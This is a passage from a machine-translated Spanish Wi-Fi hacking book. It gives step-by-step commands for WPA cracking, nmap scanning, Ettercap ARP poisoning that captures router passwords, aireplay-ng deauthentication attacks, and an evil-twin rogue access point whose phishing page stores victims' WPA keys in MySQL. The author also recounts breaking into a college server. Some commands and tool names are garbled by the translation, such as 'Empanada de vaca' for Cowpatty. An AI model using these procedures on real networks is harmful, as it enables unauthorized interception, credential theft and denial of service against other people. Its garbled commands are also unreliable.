Una vez que se complete la ejecución, la sesión se eliminará.

¿Cómo restaurar?

añadir "--restaurar". Aquí va:

[Link] -m 2500 [Link] -a 3 Hola?d?l?d?u123?l?l?u --session=blabla --restore

Hashcat ahora verificará en su directorio de trabajo cualquier sesión creada previamente y

simplemente reanudará el proceso de craqueo.
¿Suficientemente simple? Sí, lo es.

Esto es todo por Hashcat. Espero que lo entiendas bien y lo interpretes. No hay necesidad de estar
triste si no tiene suficiente dinero para comprar esas costosas tarjetas gráficas . para este propósito,
aún puede intentar descifrar las contraseñas a altas velocidades utilizando las nubes. Solo tienes que
pagar en consecuencia.

93
Machine Translated by Google

Guión de impulso de Aircrack

Aircrack Boost Script es un script de Shell de Linux que automatiza el proceso de generación de los PMK utilizados
para acelerar el descifrado de Wi-Fi.

Características

Aircrack Boost Script le permite:

1. Cree PMK usando Pyrit (multiproceso)
2. Cree PMK usando GenPMK (un solo subproceso)
3. Pasa información como argumento al script
4. Pasar información desde la entrada estándar (STDIN)
5. Genera maravillosamente PMK
6. Compara el tiempo de ejecución de las tareas
7. Úsalo GRATIS

dependencias
[Link] está diseñado específicamente para Kali Linux, pero también funcionará en otras versiones de Linux.
Asegúrese de que las dependencias estén instaladas en la máquina
1. Pirita, y
2. Empanada de vaca

Ambas herramientas vienen preinstaladas en Kali Linux, pero el script también admite el procedimiento de
instalación. Eso significa que si las herramientas requeridas (Pyrit/Cowpatty) no están instaladas, [Link] lo
descargará e instalará automáticamente antes de proceder a generar PMK.
Se vuelve realmente útil cuando desea generar PMK solo en un sistema aleatorio que cruza y olvida o no desea instalar
manualmente las herramientas necesarias cada vez.
Aircrack Boost Script hace esto por usted y eso también nos ahorra 2 secciones más aquí de instalar ambas
herramientas.
Entonces, todo lo que necesita tener es [Link] y una conexión a Internet que funcione (solo para descargar) y ¡está listo
para rockear!
No perdamos más el tiempo, veamos cómo ejecutarlo y usarlo primero.
Puede descargar el script desde [Link]

Hacer que el script de Shell sea ejecutable

Descargue y guarde Aircrack Boost Script en su Kali Linux Desktop.
¡Ahora necesitamos cambiar el atributo a "Ejecutable" para, por supuesto, hacerlo ejecutable!

Sintaxis: chmod +x <nombre de archivo>

chmod +x [Link] ./ #Añadir atributo ejecutable e(+x). "-x" eliminará el atributo ejecutable
[Link] #Ejecutar secuencia de comandos

94
Machine Translated by Google

Ejecutar
De forma predeterminada, el script muestra el menú de ayuda. Aquí puede ver 2 formas de proceder según su necesidad.

1. a través de argumentos de línea de comando

2. a través de la entrada estándar (es decir, arrastrar y soltar)

vamos con el primero

Ejecutar a través de argumentos de línea de comando

El orden de la entrada es así:

Sintaxis: ./[Link] [lista de palabras] [archivo .cap] [SSID]

./[Link] [Link] [Link] "rootsh3ll"

Desglose de comandos:
Lista de palabras: [Link]

Archivo .cap: [Link], archivo pcap capturado previamente

ESSID: rootsh3ll, nuestro AP de prueba

NOTA IMPORTANTE: Ponga el “SSID” entre comillas si incluye espacios en el nombre para evitar errores.

¡Pausa aquí! Veamos ahora cómo pasaremos el argumento a través de la entrada estándar y luego continuaremos con
la parte restante.

Ejecutar mediante entrada estándar

Para usar esta función, simplemente pase la opción '-r' al script. Comenzará a leer desde la entrada estándar, es decir,
teclado/ratón.

./[Link] -r

Esta es la mejor parte en mi opinión. No es necesario ingresar rutas súper largas a los archivos ubicados en lo profundo
del océano de directorios. ¡Simplemente arrastre y suelte!

Ahora que ha ingresado los nombres de archivo requeridos y el SSID utilizando cualquiera de los métodos, seleccione
la herramienta para generar PMK según su demanda.
Recordar,

95
Machine Translated by Google

Pyrit es una herramienta multiproceso. Utilizará el 100 % de todos los núcleos de su CPU (GPU, si es utilizable).
ver salida htop :

Es mucho más rápido que la segunda opción, es decir , genpmk, instalado con cowpatty.
Es una herramienta de subproceso único y siempre utilizará un solo núcleo de su CPU. Eso lo hace mucho más
lento que Pyrit, pero es muy útil cuando no desea asignar todos los núcleos para el descifrado y solo quiere quedarse
con 1 núcleo para la generación de PMK y descansar para sus tareas.
Vale la pena como opción. Por lo tanto, elija sabiamente. Para fines de demostración, voy con "1" , es decir, Pyrit.

¡Eso es todo! tu trabajo está hecho. Siéntate y relájate. Espere a que Pyrit genere los PMK y luego [Link] intentará
descifrar el WPA/2-PSK de los hashes generados a una velocidad súper alta.

96
Machine Translated by Google

Aquí hay una salida de muestra:

Vea la velocidad de craqueo de PSK utilizando PMK pregenerados.

Este ataque es muy específico en su tipo y puede ser realmente útil y ahorrador de tiempo cuando está probando el PIN
para SSID comunes como Airtel, Linksys, Starbucks, Belkin , etc.
Hay millones de enrutadores que todavía usan el nombre predeterminado como nombre de AP.

[Link] puede ayudarlo a ahorrar mucho tiempo sin mucho dolor de cabeza.

97
Machine Translated by Google

5
Post-explotación de la
Red

Introducción
Suponiendo que haya ingresado a una red, este capítulo arroja algo de luz sobre lo que puede hacer para
comenzar a realizar pruebas de penetración dentro del alcance de una red. Temas como:
• ¿Qué es una subred?
• Instalación de herramientas

utilizadas • Escaneo de la subred

• Rastreo usando herramientas
automatizadas • Bloqueo de la red •
Disección del cliente inalámbrico

Antes de comenzar necesitas saber qué es una subred, si ya lo sabes puedes deslizarte hacia abajo.

98
Machine Translated by Google

¿Qué es una subred?

Una subred (abreviatura de subred) es una parte separada e identificable de la red de una
organización. Es una subdivisión lógica y visible de una red IP. La práctica de dividir una red en
dos o más redes se denomina división en subredes. Las computadoras que pertenecen a una
subred se direccionan con un grupo de bits común, idéntico y más significativo en su dirección IP -
Wikipedia

Por lo general, una subred puede representar todas las máquinas en la misma red de área local (LAN)

Verifique su subred escribiendo en Terminal:

ipconfig en Windows e ifconfig en sistemas *nix
Si está conectado a una red, verá algo como

ifconfig wlan0
wlan0: flags=4163<ARRIBA, TRANSMISIÓN, EN EJECUCIÓN, MULTITRANSMISIÓN> mtu 1500
inet [Link] máscara de red [Link] transmisión [Link]
inet6 fe80::d6d2:9304:4672:98aa prefijolen 64 scopeid 0x20<enlace>
éter [Link] txqueuelen 1000 (Ethernet)
Paquetes RX 6 bytes 1576 (1,5 KiB)
Errores de RX 0 caídos 0 excesos 0 marco 0
Paquetes TX 19 bytes 2394 (2,3 KiB)
Errores de TX 0 caídas 0 excesos 0 operador 0 colisiones 0

El resultado muestra la dirección IP, que es [Link] y la Máscara es [Link].

Puede notar que solo la última parte de la máscara es '0'. Describe que su rango de IP variará en el
último lugar solo de 1-254. Como .0 y .255 son los nodos de red reservados por el propio router.

Por ejemplo,
Nuestra dirección IP es [Link], tener una máscara de subred [Link] dice que nuestra red
solo contendrá direcciones IP (dispositivos) con IP a partir de [Link] a [Link].
Si la subred es [Link], entonces el rango dinámico serán las últimas 2 columnas de la dirección IP, es decir
192.168.*.*
Aquí el asterisco (*) es la parte variable. Que puede ir desde 1-254.

Hay algunos conceptos más acc. a qué subred puede ir como [Link] en su lugar, y concepto de
clases en subredes que cambia según el rango de IP. Me gustaría que leyera sobre esos conceptos para obtener un
poco de claridad sobre la creación de redes. ver aquí

Entenderemos un concepto que se usará en este tutorial. Si escribe su máscara de subred en binario

La máscara de subred común [Link] será 11111111.11111111.11111111.00000000 en binario.

Aquí 255 se escribe como 11111111 y de ustedes cuentan el total no. de 1 son 24 para esta máscara de
subred específica.

99
Machine Translated by Google

Si la máscara es [Link], el valor binario será 11111111.11111111.00000000.00000000. asi que,

la notación de estilo CIDR será /16. ¡Sencillo! ¿no es así?

Entonces, ¿de qué sirve este 24? Esto se utiliza para facilitar que los escáneres de red indiquen el rango de
direcciones IP que estamos interesados en escanear simplemente pasando '/24' junto con la dirección IP al
escáner. Escáneres como nmap o sniffers como ettercap. Que vamos a utilizar en breve.

Herramientas utilizadas

nmap (mapeador de red) es un escáner de seguridad, originalmente escrito por Gordon Lyon , que se usa para
descubrir hosts y servicios en una red informática, construyendo así un "mapa" de la red.
Para lograr su objetivo, Nmap envía paquetes especialmente diseñados a los hosts de destino y luego analiza las
respuestas. nmap viene preinstalado en Kali Linux y en casi todas las distribuciones de Linux.

También puede descargar el código fuente de nmap para Windows y MacOS desde [Link].
[Link]

ettercap es una suite para ataques man in the middle en LAN. Cuenta con rastreo de conexiones en
vivo, filtrado de contenido sobre la marcha y muchos otros trucos interesantes.

Instalacion y configuracion
Instalar nmap desde el código fuente
Descargue el código fuente y ejecútelo en la Terminal:
tar xvf nmap*.tar.bz2 cd #Extracto
nmap*/ ./configure #Cambio de directorio

hacer
sudo hacer instalar #Instalar archivos binarios/man-pages y configuraciones en el sistema

Instale nmap a través de apt-get en Debian/Ubuntu

sudo apt-obtener actualización
sudo apt-get install nmap -y

Instale Ettercap desde el código fuente:

Necesitas instalar una herramienta llamada cmake para compilar el código fuente

sudo apt-get update cmake -y

100
Machine Translated by Google

Ahora para extraer e instalar escriba en Terminal

tar zxvf ettercap-*.[Link] #Extraer ettercap

cd ettercap*/ #Cambiar directorio
mkdir build #Crear nuevo directorio
compilación de CD #Cambiar directorio para compilar/
hacer ../
hacer #Compila Ettercap usando cmake
hacer instalar #Instalar archivos binarios/man-pages y configuraciones en el sistema

Instale Ettercap usando apt-get en Debian/Ubuntu

Ejecutar en la Terminal:

sudo apt-get install ettercap -y

Escaneo de la subred
Usaré 2 herramientas para demostrar el concepto de escaneo de la red y más Pentesting.

• nmap : para escanear subredes y más Pentest en dispositivos

• Ettercap : para escanear subredes y olfatear la red

Aprenderemos Ettercap un poco más en detalle que nmap , ya que le mostrará cómo escanear y olfatear
la red para recopilar las credenciales pasadas a través del enrutador, cómo hacerlo y las contramedidas.

Vamos a empezar,

Escanee la subred usando nmap

Ejecutar en la Terminal:

Sintaxis: nmap <dirección IP>/24

nmap [Link]/24

[Link] es la dirección IP de Kali Linux y /24 se usa como máscara, que es [Link]. Verifique la
configuración de su red, puede diferir.

Este comando simplemente escaneará el rango [Link] - [Link] y volcará la salida que muestra
las direcciones IP y los servicios correspondientes que se ejecutan en los dispositivos.
nmap ofrece opciones de tiempo para reducir el tiempo de escaneo o el estrés de la red y/o evadir IDS
(Sistemas de detección de intrusos) según sea necesario.

La salida se muestra solo cuando se completa el escaneo, aunque puede presionar <TAB> para verificar el
progreso del escaneo, pero no siempre es útil presionar <TAB> todo el tiempo. Entonces, usamos algunos
argumentos de nmap para acelerar el escaneo y mostrar la salida en tiempo real.

101
Machine Translated by Google

Sintaxis: nmap <dirección IP>/24 -T <argumento> -v

Aquí, -T le dice a nmap que use la opción de sincronización y -v significa salida detallada
nmap ofrece 6 opciones de tiempo.

0: paranoico

1: astuto
2: Cortés
3: normales

4: agresivo
5: Loco

nmap [Link]/24 -T 5 -v

Por defecto, nmap usa la opción 3, es decir, escaneos normales

Los dos primeros son para la evasión de IDS. El modo educado ralentiza el escaneo para usar menos ancho de banda y

recursos de la máquina de destino. El modo normal es el predeterminado, por lo que -T 3 no hace nada. El
modo agresivo acelera el escaneo al suponer que se encuentra en una red razonablemente rápida y confiable.
Finalmente, el modo insano asume que estás en una red extraordinariamente rápida o que estás dispuesto a
sacrificar algo de precisión por la velocidad.
Producción:

Como puede ver en la salida anterior, nmap muestra los puertos abiertos y los servicios correspondientes
de todos los hosts activos. Verá la diferencia cuando lo ejecute en vivo. ¡Hazlo ahora!
usted podría estar pensando ahora qué?
Como puede ver en la imagen de arriba, no elegiremos [Link], ya que es el enrutador en sí, lo cubriremos
en la siguiente sección. Pero vemos que 2 puertos (SSH y HTTP) están abiertos para el host [Link].

Ahora podemos realizar varios ataques en este host específico. Ataques como fuerza bruta en SSH

102
Machine Translated by Google

(puerto 22). Intente abrir [Link] en el navegador y verifique si se está ejecutando algún servicio basado
en la web para que podamos explotarlo solo desde allí o no.

Los diferentes sistemas tienden a tener diferentes servicios en ejecución y, en consecuencia, las pruebas de penetración difieren. He
deshabilitado todos los puertos innecesarios para que nmap no muestre ningún servicio/puerto.

Ingresé al servidor de la biblioteca de My College desde mi habitación del albergue simplemente usando
un servicio que se ejecuta en un servidor remoto a través del navegador. Pude acceder/cerrar la administración
y/o el sistema completo de la biblioteca. Entonces, desde aquí conoces el poder de escanear
(reconocimiento) usando nmap.
Las autoridades de la universidad informaron y corrigieron la vulnerabilidad poco después.

Pasando a Ettercap. Ya hemos instalado Ettercap. Ahora ejecute Ettercap desde la Terminal.
Primero aprenderemos a usar la GUI de Ettercap para mantenerlo simple y fácil al principio.

Ejecutar en la Terminal:

Sudo Ettercap -G

el uso de -G iniciará la interfaz gráfica de Ettercap.

Ahora vaya a Sniff > Unified Sniffing y seleccione la Interfaz inalámbrica. El mío es wlan1 y haga clic en
Aceptar.

Ahora, como queremos olfatear la red, primero debemos entender cómo puede ser esto posible.
entendamos!

Sabemos que todos los datos de un dispositivo se transfieren a través del enrutador y el enrutador distingue
entre dispositivos usando sus direcciones MAC. Si de alguna manera pudiéramos hacernos pasar por el
enrutador, ¿no comenzarían los dispositivos a enviarnos ([Link]) todo su tráfico? suena legítimo,
¿verdad?

Sí, lo es. Esto es lo que es un MiTM, o Man-in-The-Middle Attack. Se realiza envenenando el ARP (Address
Resolution Protocol) tablas del dispositivo.
En el que el atacante se interpone entre el enrutador y los dispositivos y actúa como enrutador para los
dispositivos. luego, los dispositivos envían todos sus datos al atacante y el atacante luego registra los datos
y reenviarlo al enrutador.

103
Machine Translated by Google

¿Cómo funciona el envenenamiento por ARP?

El envenenamiento ARP es un método utilizado para manipular el flujo de tráfico entre hosts arbitrarios en una red de
área local. Explotar una red con un ataque de envenenamiento ARP permite a un atacante redirigir el tráfico que pasa
entre las estaciones de trabajo y los servidores en la LAN a través de un nodo malicioso, donde el atacante puede
monitorear, modificar o DoSed el tráfico. En
el nivel más alto, el envenenamiento ARP funciona modificando las tablas ARP

Las respuestas ARP no solicitadas son paquetes de respuesta ARP recibidos por una máquina que la máquina nunca
solicitó; es decir, nunca se envió una solicitud ARP al nodo del que proviene la respuesta ARP.
Esto permite que un hacker falsifique una respuesta ARP en la que los campos de dirección IP y dirección MAC se
pueden configurar en cualquier valor. La víctima que recibe este paquete falsificado aceptará la respuesta y cargará
el par MAC/IP contenido en el paquete en la tabla ARP de la víctima.
Realicemos el ataque de envenenamiento ARP.

Presione CTRL+S para escanear los hosts en la subred

Ahora presione CTRL+H para mostrar la lista de Hosts

Aquí [Link] es el enrutador y [Link] es la máquina remota de Windows. Nota

el Router MAC, se va a cambiar.

Haga clic en Mitm > Envenenamiento de Arp... Luego seleccione la casilla de verificación de conexiones remotas Sniff y haga
clic en Aceptar

104
Machine Translated by Google

A partir de aquí, Ettercap administrará el ataque, solo necesita monitorear la salida que se muestra en la columna inferior.

Cuando comencé a olfatear, abrí el navegador en la máquina con Windows, es decir, Victim ([Link]), me

conecté a través de Wi-Fi y abrí la interfaz web del enrutador ([Link]) y probé 3 combinaciones diferentes de nombre
de usuario: contraseña, las primeras 2 incorrectas y la tercera uno correcto y tan pronto inicié sesión con las credenciales

correctas Este fue el resultado en la ventana de Ettercap

admin:adminf y testuser:testpass son las credenciales de inicio de sesión del enrutador incorrectas que la víctima intentaba iniciar

sesión en el enrutador. Mientras que cuando se ingresaba rootsh3ll:iamrootsh3ll, se podía acceder a todas las páginas a través

del navegador de la víctima, cuyo tráfico pasaba a través del sistema del atacante en formato de texto sin formato (HTTP) sin

cifrar .

Ettercap no capturará las credenciales de los sitios web que se ejecutan sobre SSL. La detección de sitios web habilitados

para SSL requiere que se solucionen muchos problemas, como certificados firmados, SSL, HSTS . Lo aprenderemos en una

publicación separada más adelante.

Por lo tanto, pudimos recuperar las credenciales de inicio de sesión web del enrutador sin siquiera obtener información física.

105
Machine Translated by Google

acceso a la víctima.

Genial, ¿no? bueno, eso es solo el comienzo. Puede usar las credenciales del enrutador para varias operaciones, como:
1. Filtrar otras MAC para acceder a Internet o a la interfaz web del enrutador.

2. Limite la velocidad de Internet a todos los usuarios excepto a usted.

3. Elimina el límite de Internet, si se aplica a ti o a otros usuarios.
4. Cambie la dirección DNS para rastrear en todo el mundo.
5. Y muchos otros. ¡Solo explora!

Oler el enrutador es solo una cosa que puede explorar, hay muchas otras técnicas que podemos aprender para
probar la fuerza de la red o los dispositivos.
Cubriremos uno por uno en detalle. Solo hágame saber sus puntos de vista para seguir adelante y mejorar la calidad de
cada publicación. Vea cómo se ve la interfaz del enrutador desde el sistema del atacante.

Eso es todo por ahora sobre olfatear la subred.

106
Machine Translated by Google

Prevenir ataques de rastreo

Solo hay una forma para que la víctima confirme que está siendo rastreado a través de la W/LAN.
verifique las tablas arp y vea si la MAC de ningún dispositivo coincide con la MAC del enrutador.

arp-a //Windows, MAC o *nix

Echar un vistazo:

Si nota que la dirección MAC del enrutador (0.1) en la primera ejecución es diferente a la MAC del atacante en
este caso, es decir, 0.100

Cuando ejecuté el comando nuevamente después de iniciar el ataque MiTM, desde el punto de vista de la
víctima, el enrutador ahora es [Link].
¿Cómo?

Dentro de una red, los datos se transfieren utilizando las direcciones MAC de los dispositivos conectados. Asi que,
a medida que se falsifica la MAC del enrutador (para la víctima), la víctima comienza a enviar tráfico a la
MAC del atacante, que en este caso pretende ser el enrutador.
Espero que quede claro hasta ahora, ya que vamos a cubrir un aspecto diferente de estar fuera de la red.
avancemos

107
Machine Translated by Google

Interferir en la red Wi-Fi

Tenga en cuenta que para bloquear una red, es decir, prohibir a todos los usuarios de una red, no necesita
conectarse a la red ni conocer la contraseña de la red.
Solo necesita crear algunos paquetes y transmitir en el aire, incluidos el MAC y el SSID del AP, y un
paquete de desautenticación incluido para indicarles a todos los usuarios conectados/conectados que se
desconecten.

¿Cómo funciona?

Creamos un paquete usando aireplay-ng del conjunto de herramientas aircrack-ng y lo transmitimos en el aire
que luego es recibido por los usuarios. El cliente comprueba el paquete en busca de su fuente. Solo hay una
forma de que el dispositivo cliente sepa esto, el encabezado del paquete. Donde el dispositivo puso su
dirección MAC, y eso puede ser alterado. Lo haremos usando aireplay-ng. Más adelante estudiaremos en
detalle cómo hacerlo mediante programación.

Fuente: Wikipedia

Ejecutar en la Terminal:

Sintaxis: aireplay-ng -0 <no. de solicitudes> -a <BSSID> -e <ESSID> <interfaz-modo-monitor>

sudo aireplay-ng --deauth 0 -a [Link]" -e "rootsh3ll" wlan0mon

Se puede usar cero (0) en lugar de --deauth y poner el SSID entre comillas para evitar conflictos. -0:

código para la solicitud de deauth 1 para la solicitud Fake-ARP y así sucesivamente.

108
Machine Translated by Google

Ataque # Nombre del ataque

0 Desautenticación
1 Autenticación falsa
2 Reproducción de paquetes interactivos

3 Ataque de repetición de solicitud ARP

4 Ataque ChopChop de Korek
5 Ataque de fragmentación
6 Ataque de café con leche

7 Ataque de fragmentación orientado al cliente

8 Prueba de inyección

-0 0, o --deauth 0 significa solicitudes de deautenticación ilimitadas, --deauth 5 significa que aireplay-ng enviará 5 paquetes de

deautenticación y luego saldrá.

Esto fue para transmitir los paquetes de deauth para bloquear la red, ¿qué pasa si el atacante quiere bloquear el acceso a la red solo

para uno o los usuarios seleccionados?

Simplemente use la opción -c para decirle a aireplay-ng qué cliente desea DoS.

Diseccionando un cliente inalámbrico

Esta es una solicitud llamada Unicast, ya que estamos enviando paquetes a un cliente único/específico. También puede llamarlo

ataque DoS (denegación de servicio).

aireplay-ng --deauth 0 -a [Link] -e "rootsh3ll" -c [Link] wlan0mon

¿Recuerdas cuando intentamos desconectar al cliente enviando 5 paquetes de desautorización para capturar el protocolo de enlace

WPA/2? Si, es lo mismo. Si solo usa 0 en lugar de 5, aireplay-ng enviará paquetes sin cesar al cliente, lo que resultará en que no

haya acceso a la red/desconexión del cliente.

109
Machine Translated by Google

6
Punto de acceso no autorizado:
Introducción

Visión de conjunto

"Un punto de acceso Wi-Fi falso es un punto de acceso inalámbrico que se ha instalado en una red segura sin la autorización

explícita de un administrador de red local, ya sea agregado por un empleado bien intencionado o por un atacante malicioso" -

Wikipedia

El punto de acceso Wi-Fi falso a menudo se denomina como:

• Punto de acceso no autorizado, o

• Punto de acceso Evil-Twin

Todos los métodos que hemos visto hasta ahora eran demasiado lentos o consumían demasiados recursos.

¿No sería mejor si pudiéramos recopilar la contraseña de Wi-Fi en texto sin formato para ahorrar tiempo, esfuerzo, energía y

recursos necesarios para descifrar el hash WPA/2?

¡Buenas noticias!

Esto es posible utilizando el punto de acceso Fake Wi-Fi o el infame método Evil-Twin.

110
Machine Translated by Google

Anteriormente, hasta Kali Linux 1.x, solíamos crear el punto de acceso Wi-Fi falso y unir la interfaz con la interfaz
predeterminada de la máquina virtual usando la utilidad brctl , pero desde Kali Linux 2.0 , brctl no es compatible y
también dhcp3-server se cambia a isc-dhcp-server que causa demasiados problemas al usar scripts de automatización.

No usaremos ningún script automatizado, sino que entenderemos el concepto y trabajaremos para que pueda
realizarlo manualmente, hacer su propio script para automatizar la tarea, simplificar la vida y fortalecerlo.

¡Vamos a profundizar en!

Resumen del ataque

Paso 1: nace el gemelo malvado
Escanee el aire en busca de su(s) punto(s) de acceso objetivo. Cree un punto de acceso con el mismo
ESSID y número de canal. usando airbase-ng para su punto de acceso de destino, por lo tanto, Evil-TWIN.

Paso 2: La esclavitud inalámbrica

El cliente ahora está desautenticado repetidamente desde el punto de acceso original y usted espera hasta
que se conecte a su punto de acceso.
Paso 3: un cebo agresivo
Los clientes ahora están conectados al punto de acceso de Wi-Fi falso y ahora el cliente puede comenzar
a navegar por Internet.
Paso 4: Atrapa la frase
El cliente ve una advertencia del administrador web que dice "Ingrese la contraseña WPA para descargar y
actualizar el firmware del enrutador"
Paso 5: Colgar hasta la muerte
La frase de contraseña ingresada será redirigida a una página de carga y la contraseña se almacenará en
la base de datos MySQL de la máquina atacante.

Escanear el aire en busca de solicitudes de sondeo de clientes puede llevarlo a descifrar la frase de contraseña
WPA2-PSK sin ningún punto de acceso existente o, a veces, sin ningún apretón de manos.

Herramientas utilizadas

• airmon-ng, airodump-ng, airbase-ng y aireplay-ng

• isc-dhcp-servidor
• iptables
• apache, mysql
• Navegador web Firefox en la víctima Ubuntu 16.04

Preparación de ataque
“Denme seis horas para talar un árbol y pasaré las primeras cuatro afilando el hacha”

111
Machine Translated by Google

-Abraham Lincoln

La preparación de este ataque lleva la mayor parte del tiempo, ya que incluye la instalación de herramientas, la
configuración y la instalación del punto de acceso no autorizado en el servidor apache y la gestión del flujo de tráfico
de la red.

Aunque la parte manual del ataque es solo la desautenticación del cliente, el resto está automatizado.

Punto de acceso no autorizado: configuración

Instalación
El paquete de herramientas aircrack-ng, apache, mysql, iptables ya está instalado en nuestra máquina virtual Kali
Linux.

Solo necesitamos instalar isc-dhcp-server para la asignación de direcciones IP al cliente.

Instalar isc-dhcp-servidor
Ejecutar en la Terminal:

actualización adecuada

apt install isc-dhcp-servidor -y

Leyendo listas de paquetes... Listo
Construyendo árbol de
dependencias Leyendo información de estado... Listo

Se instalarán los siguientes paquetes adicionales:

libirs-export141 libisccc-export140 libisccfg-export140 policycoreutils selinux-utils

Se instalarán los siguientes paquetes NUEVOS:

isc-dhcp-servidor libirs-export141 libisccc-export140 libisccfg-export140 policycoreutils
0 actualizado, 6 recién instalado, 0 para eliminar y 388 no actualizado.
Necesita obtener 1.742 kB de archivos.
Después de esta operación, se utilizarán 6659 kB de espacio adicional en disco.

Obtener:1 [Link] kali-rolling/main amd64 libisccc-export140 amd64 1:[Link].P4-12.3

[198 kB]
Obtener:2 [Link] kali-rolling/main amd64 libisccfg-export140 amd64 1:[Link].P4-12.3
[220 kB]
Obtener:3 [Link] kali-rolling/main amd64 libirs-export141 amd64 1:[Link].P4-12.3
[199 kB]
Obtener:4 [Link] kali-rolling/main amd64 isc-dhcp-server amd64 4.3.5-3 [525 kB]
Obtener:6 [Link] kali-rolling/main amd64 policycoreutils amd64 2.6-3 [482 kB]
Obtuvo 1742 kB en 9 s (193 kB/s)
-----------------------------------------------<SNIP> -----------------------------------------------
Configurando isc-dhcp-server (4.3.5-3)...
Generando /etc/default/isc-dhcp-server...
update-rc.d: No tenemos instrucciones para el script de inicio isc-dhcp-server.
update-rc.d: Parece un servicio de red, lo deshabilitamos.
Disparadores de procesamiento para libc-bin (2.24-9) ...
Disparadores de procesamiento para systemd (232-22) ...

Esto actualizará el caché del paquete e instalará la última versión del servidor dhcp en su Kali Linux.

112
Machine Translated by Google

Todas las herramientas necesarias están instaladas. Necesitamos configurar Apache y el servidor DHCP para
que el punto de acceso asigne la dirección IP al cliente/víctima y puedan acceder a nuestra página web de forma
remota.

Configurar Apache MySQL y servidor DHCP

Descargue los archivos web de Rogue AP desde [Link] y extráigalo en su escritorio.

descomprima rogue_AP.zip -d /var/www/html/

Este comando extraerá el contenido del archivo rogue_AP.zip y lo copiará en el directorio de trabajo de apache.
Cuando la víctima abre el navegador, será redirigido automáticamente a la página web [Link] predeterminada .

Para almacenar las credenciales ingresadas por la víctima en la página html, necesitamos una base de datos SQL.
En el directorio extraído, verá el archivo [Link] , pero para que tenga efecto necesita crear una base de
datos. [Link] reflejará y luego reflejará los cambios en el apropiado
DB.

Abra la consola mysql en la terminal:

mysql -u raíz

Cree una base de datos y una tabla como se define en [Link].

Debería ir así:
mysql> crear base de datos rogue_AP;
mysql> use rogue_AP;
mysql> crear tabla wpa_keys(contraseña1 varchar(64), contraseña2 varchar(64));

Compruebe si se puede escribir en la base de datos,

mysql> insert into wpa_keys(password1, password2) valores ("testpass", "testpass");

mysql> seleccione * de wpa_keys;
+-----------+------------------+
| contraseña1 | contraseña2 |
+-----------+------------------+
| paso de prueba | paso de prueba |
+-----------+------------------+
1 fila en conjunto (0.01 seg)

Si selecciona * de wpa_keys; refleja los valores ingresados anteriormente, su base de datos está funcionando

113
Machine Translated by Google

bien.

Configurar el servidor isc-dhcp

Defina el rango de IP y la máscara de subred para los clientes.

nano /etc/dhcp/[Link]

y guarde este texto en el archivo

subred [Link] máscara de red [Link]

{
autoritario; rango
[Link] [Link]; tiempo de
arrendamiento predeterminado
600; tiempo máximo de
arrendamiento 3600; opción máscara de
subred [Link]; opción dirección de
difusión [Link]; opción enrutadores [Link];
opción servidores de nombres de dominio
[Link]; opción nombre de dominio "[Link]";
}

Cuando dhcpd se instala por primera vez, no hay una base de datos de arrendamiento. Sin embargo, dhcpd requiere que
esté presente una base de datos de arrendamiento antes de que se inicie. Para crear la base de datos de arrendamiento
inicial, simplemente cree un archivo vacío llamado /var/lib/dhcpd/[Link]. Puedes crear esto manualmente:

toque /var/lib/dhcpd/[Link]

(Opcional) airmon-ng, conflicto de administrador de red

Network-manager no quiere perder el control de sus dispositivos de red. Tan pronto como pones la tarjeta Wi-Fi en modo
monitor, se pone forzosamente en modo administrado. Durante el pentest, no desea cambiar de modo de un lado a otro
todo el tiempo. Entonces, antes de habilitar el modo de monitor en la tarjeta inalámbrica, arreglemos el conflicto entre airmon-
ng y el administrador de red para siempre.

Una forma es ejecutar airmon-ng check kill cada vez que comience la prueba de Wi-Fi. Por otro lado, es posible que desee
utilizar el administrador de red para encargarse de otras interfaces de red como ethernet, dongles, etc.

Para solucionar este conflicto, simplemente dígale al administrador de red que no administre nuestro dispositivo Wi-Fi.
Él te escuchará confía en mí.

Para que no necesite matar al administrador de red o desconectar cualquier conexión de red antes de poner el adaptador
inalámbrico en modo monitor. Proporcione un identificador único del dispositivo (Dirección MAC) al administrador de red, no
volverá a meterse con él.

114
Machine Translated by Google

Abra el archivo de configuración predeterminado del administrador de red :

gedit /etc/NetworkManager/[Link]

Agregue el siguiente código para ignorar el dispositivo con la dirección MAC deseada

[archivo de clave]

dispositivos no administrados = mac: 00: 19: e0: 57: 86: af

Separe varios dispositivos con comas. Ej: mac: [Link], mac: [Link]

Recopilación de información
Es muy recomendable guardar la información de la víctima de antemano. Simplemente te ahorrará tiempo y te ayudará en momentos

de pánico.

Habilitar el modo de monitor

airmon-ng comprobar matar

airmon-ng iniciar wlan0

Recopilación de información con airodump-ng

La tarjeta está en modo monitor, sin problemas con el administrador de red. Simplemente inicie airodump-ng

airodump-ng wlan0mon
CH 1 ][ Transcurrido: 3 s ][ 2017-07-12 22:12

BSSID Balizas PWR RXQ #Datos, #/s CH MB ENC CIPHER AUTH ESSID

64: 66: B3: 6E: B0: 8A -22 79 436 9 0 1 54e WPA2 CCMP PSK raícesh3ll
54: B8: 0A: 8E: 36: 00 -73 0 138 0 0 1 54e WEP WEP abhinav

Tan pronto como su AP de destino aparezca en la ventana de salida de airodump-ng, presione CTRL-C y anote estas tres cosas en un

editor de texto (gedit, por si acaso)

BSSID: 64: 66: B3: 6E: B0: 8A

ESID: raícesh3ll
Canal: 1

(Opcional) Lleve la potencia de TX al máximo: 1000 mW

TX-power significa potencia de transmisión. De forma predeterminada, está configurado en 20 dBm (decibelios) o 100 mW.

La potencia de TX en mW aumenta 10 veces con cada 10 dBm.

Si su país está configurado en EE. UU. durante la instalación. lo más probable es que su tarjeta funcione en 30

115
Machine Translated by Google

dB (1000 mW)

En Kali Linux, es posible que tenga problemas al encender su tarjeta.

Como en versiones anteriores, si configura el país (región) en Bolivia, puede operar la tarjeta a 30 dBm pero en Kali
no funciona. Entonces, usaremos EE. UU. como nuestra región.

ifconfig wlan0mon down iw #Bajar la interfaz

reg set US ifconfig wlan0mon #Establecer región para ser EE. UU.
up iwconfig wlan0mon #Sube la interfaz
#Compruebe la potencia de transmisión, debe ser de 30 dBm

¿Por qué necesitamos cambiar de región para operar nuestra tarjeta a 1000mW?

Porque los diferentes países tienen diferentes permisos legales de dispositivos inalámbricos en cierta potencia
y frecuencia. Es por eso que la distribución de Linux tiene esta información incorporada y necesita cambiar su
región para permitirse operar en esa frecuencia y potencia.

El motivo de encender la tarjeta es que al crear el punto de acceso, no es necesario estar cerca de la víctima.
El dispositivo de la víctima se conectará automáticamente al dispositivo con mayor intensidad de señal, incluso si
no está físicamente cerca.

Configurar redes
Encienda el punto de acceso falso

Crea el punto de acceso usando airbase-ng:

